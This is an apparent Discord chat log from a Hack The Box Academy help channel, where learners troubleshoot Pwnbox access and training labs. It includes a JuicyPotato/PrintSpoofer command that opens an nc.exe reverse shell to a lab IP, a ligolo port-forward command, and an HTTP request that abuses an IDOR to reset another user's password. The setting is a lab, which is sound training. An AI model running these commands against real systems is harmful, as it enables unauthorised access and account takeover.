There could've been some sort of connection issue. That sometimes happens to me too

yeah

Yeah reset it

is there going to be any modules regarding to devsecops or sys administration or sm like that? 👀

that would be reaaallyyy cool

Hi

Hello

I want a roadmap where can I find one ?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

HTB doesn’t work in my country

How are you here then?

VPN

HTB servers doesn’t allow vpn

Solutions?!

If I set up a VPN connection with Proton, I can reach the HTB portals.
Why do you think that HTB would not allow VPN connections?

Idk it just says no

And I can’t buy proton vpn either because of sanctions

Guys It's been long time where the ssh username is for connection to pwnbox ? there is only IP address and (password) I assume?

On the desktop probably

thank you!

Was it there?

yeah but couldn't connect again...

there is username and password when I go for ssh username@IP, always give me permission denied

I assume you entered the password correctly?

And double check the IP of pwnbox

yeah also copied and pasted

Lemme check

No way in hell I can handle it 😄

I don't even know why it doesn't work so sad, how stupid I am

Well it works for me

Make sure you're connected to the academy VPN

well I didn't

Connect lol

use the "ens3" IP when SSHing to pwnbox

wdym ens3?

ifconfig in the terminal

What IP were you trying to connect to?

academy nmap default

no, you need to ssh into pwnbox

Use the IP of the pwnbox machine

This is probably a VPN

I am not sure

If it is, then you're trying to ssh into yourself

in pwnbox, open terminal and type ifconfig or ip a find the "ens3" interface and use it's IP to ssh. For example, ssh your_username@ens3ip

It should be so easy to connect as I've done several modules 5 months ago but It says permission denied lul

I'm just doing academy modules 😄 is it changed?

Do you wanna ssh into pwnbox?

y

can I ss here?

.

Do this

I personally don't know how it was before, but the way I described worked for me

thanks anyway

section?

rax will contain a value that is 8 less than the initial stack pointer value.

make sure you have stopped at the right instruction, send a screenshot of your gdb

well your rax is 0 so you didn't stop at the right instructions

Hello!. Right now I am working my way toward finishing the 'web-attacks' module. Still, I am stuck at the skill assessment part, which may look like I failed to understand the module or didn't really take the time to learn it but no I absolutely grasped every bit of info I could so here are the steps I took and the part that I am stuck at :

1. I found that the website has 100 configured users.
2. I created a script to go through all users retrieving their info. would look something like that. {"uid", "username", "full_name", "company":}
   3 Then I found the administrator user.
3. trying to privilege escalate that user.
   .Tryed SQL injection in the login form with the user username (failed)
   . I tried to change the user password by logging in as the HTB user and then
   changing the uid in the cookie to the UID of the user but still failed
   this is the point where I am stuck, If any one Knowes a solution or another path I would appreciate the help sorry for writing a whole essay and thanks in advance.

guys please help me 😦

I've got issues about login into pwnbox for academy modules. I don't know why but when I go like ssh username@IP and enter password as the same one with my_credentials.txt. Doesn't work for me

the creds are given above the questions

Did you take the IP from the external NIC?

Web Service & API Attacks - Skills Assessment

why

I got it from the bottom after IP (ACADEMY-NMAP-DEFAULT) exist

yeah couple months ago It was like that but now I'm back and there is nothing like that only IP and it says (ACADEMY-NMAP-DEFAULT)

oh for this one you're not supposed to login, use nmap on the target

no way in hell

thank you 😄

Web Service & API Attacks - Skills Assessment

why

i already add SOAPAction header and same problem

Remember that you have to encode special characters in XML

bro

the error is Missing SOAPAction header

bro what's line 13

nothing

in image is d

but i already delete it

and same problem

deez nuts

Try || SOAPAction: "Login" || and encode the special chars

thx its works !

https://academy.hackthebox.com/achievement/1194466/160

can anybody help me with the challenge of the advanced command obfuscation module in command injections?

anyone with rockyou downloaded can crack a hash for me?

• https://crackstation.net/
• https://md5hashing.net/hash
• https://hashes.com/en/decrypt/hash

i need to decrypt a bcrypt hash

nvm i cracked it

Hi everyone,
Is it normal that my "Spawns" shows 0/1 after I terminated mine ?

Now I can't start one

As a free user you can start a PwnBox once a day

oh, even if I terminate it ?

Yes

Would be nice if that was in the "intro to academy"

Ur you can use your VM

Thank you @acoustic owl

.......

well, worth to subscribe then

does anyone have a command to open a port with ligolo ? Like if the pivot is listening on 127.0.0.1:9001, how would we make that available to attacker machine too ?

have you tried using the proxy ?

listener_add --addr 0.0.0.0:9001 --to 0.0.0.0:9001

optionally add --tcp

do this command while in a session

problem is the target is already listening on that port for a service

but it's only listening on 9001 locally so looking for away to make it available from outside

then use a different port

--addr 0.0.0.0:9002

then when you want to add a new session from another host, specify -connect x.x.x.x:9002

hmm this time the command took, but I still cannot scan it with nmap

ahhh

nvm it worked, I am mega dumb

thanks a bunch

also i fcked up the last part of the command, it should be --to 127.0.0.1:9001

0.0.0.0:9001 works but it has caused me some issues in the past

Has anyone had problems with the Dante prolab? The web server is just not working anymore.

Hello, does anyone can help me with Windows Privilege Escalation Skills Assessment - Part I third question please?

what issues do you have

I've tried all the possible tools - Juicy Potatoe, printspoofer, other potato tools. nothing works. I'm pretty sure its command syntax problem

what access do you have on the machine?

and what is the syntax

i've obtained reverse shell from that web page, I set there a folder called 'Tools', downloaded some tools there, and did the same precedures that worked in "SeImpersonate and SeAssignPrimaryToken" section and more. and for syntax for example i tried: - .\PrintSpoofer.exe -c ".\nc.exe 10.10.15.241 4445 -e cmd

if you do whoami, what is the level os access you have?

PS C:\Tools\one> whoami
iis apppool\defaultapppool

ok

clisid are you using?

I believe it is called 'CLSID', either way i got a value of which in some of the tool's outputs.
so i have it

which is the value of that?

{4991d34b-80a1-4291-83b6-3328366b9097}

wna how your juicypotato command is structured?

Hi, I need help with this module.
After I change the PORT to the 1337 and add IP of the hosts file
It seems still doesnt works
The fatty-client.jar still has connection issue.

Can someone help me?
I already deleted the file 1.SF and 1.RSA and clear the hash verification on manifest file

for me juicypotato was they way usind the right clsid

the same method provided in "SeImpersonate and SeAssignPrimaryToken" section
c:\Tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c .\nc.exe 10.10.15.241 4445 -e cmd.exe" -t *

ok good enough but where is the clsid value?

{4991d34b-80a1-4291-83b6-3328366b9097}

i mean in your command

it is not there

that is the value i got. I did not insert it directly to the command.

{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}

use the following

of wpnservice

one moment please

SUCSESS! THANK YOU!

Hey everyone !
So basically I'm doing the Getting Started module and I'm stuck on the part where I have to find a public exploit and use it against a system.
I'll explain : I've done a scan of the IP, I've got the service used and his version. I'm stuck on "finding the exploit"
I keep searching online with the name and version of the service but I don't find anything, even on ExploitDB or Rapid7.
I keep going back and forward with the lesson about searching an exploit but I feel like I'm missing something big.
I don't want the answer, only a hint or something that can push me a bit.
Thanks 🙂

https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard

Whats the service youre looking for?

Apache httpd 2.4.41

So maybe you can find more services?

I found Wordpress 5.6.1

but didn't found anything about it too

Thats closer.

Okay I'll try to orientate my research on this thanks @soft reef 🙂
I'll come back if I'm still stuck

🙏

I am still working on the same problem can't change the user password, because the website uses PHPSESSID to check the session data in the data base and see that the user that I am trying to change his password I didn't log in with. so it gives me an access denied message.

If any one even have an idea of what to do here I would be thankful.

have you tried the attacks shown in the module? you said that you tried SQL injection, but there's no reason to do that when the module doesn't cover it

yes, I leveraged the IDOR vulnerability to get all the user's data. The only form of privilege escalation in the module was to change the HTTP request . The function that handles the password reset uses only the post HTTP request so if I change the request type to any other one like put it gives me "Missing parameters"

So what do you recommend I try next

i don't remember anything from the skills assessment... but you should have everything you need to privesc

👍

based on the info you have, i believe you can privesc to admin account now

Yes, but the function that the server uses to reset the password only accepts the POST http request any other input is handled to out put "Missing parameters"

same output "Missing parameters"

GET /reset.php HTTP/1.1
Host: 94.237.58.3:34537
Content-Length: 63
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: /
Origin: http://94.237.58.3:34537
Referer: http://94.237.58.3:34537/settings.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=hdsev2v82pg6dn829c80gndndc; uid=52
Connection: keep-alive

uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=1234

ok after I fixed it but the output page was 2 of the old page under each other. How can I send a a screen shoot

Password changed successfully

Why the f was I even trying to do it manually when I am still learning thank you so much for your help and I am sorry for the trouble for a dume fix

read #welcome and do the verification to send screenshots

will do

are the following wrong? https://academy.hackthebox.com/module/255/section/2910

Like also the following
gabriel has non access or paths to PCTEST001, but MARTHA yes
https://academy.hackthebox.com/module/255/section/2839

no, the section is about using the rights of one user to access another

what about the second one, i had no success authentication as gabriel, i had to use martha there

don't remember but martha's creds are not given

yes they should be found, i had no clue on how to use that gabriel user

yes ok, but using julio i should target julio? makes no sense and also has no securityidentifier , should use julio to find Wayne

just did the first questions abusing wayns and not julio..

abuse the rights of user julio

julio has the rights

There's an intro to ad module

Also the information Security Foundations path is considered a pre-req and includes Intro to Windows CLI, and intro to activedirectory

Hello I still have a problem with "getting started" module, at "public exploits" i have to hack a website and login to the admin page.
Yesterday I did it and also found the flag but I wanted to try something different so I left it there thinking I could just do the same and find it again, that box should be solved by using gobuster, finding robots.txt, looking at the source code and finding the login information for the admin and also the directory to login in to. Now there is no robots.txt and no login page
I did find the flag yesterday tho I am 100% sure thats how the room should be solved. I reset the target, changed vpn, updated my Kali VM, changed the workstation on htb, waited for more than 12 hours and the problem is the same.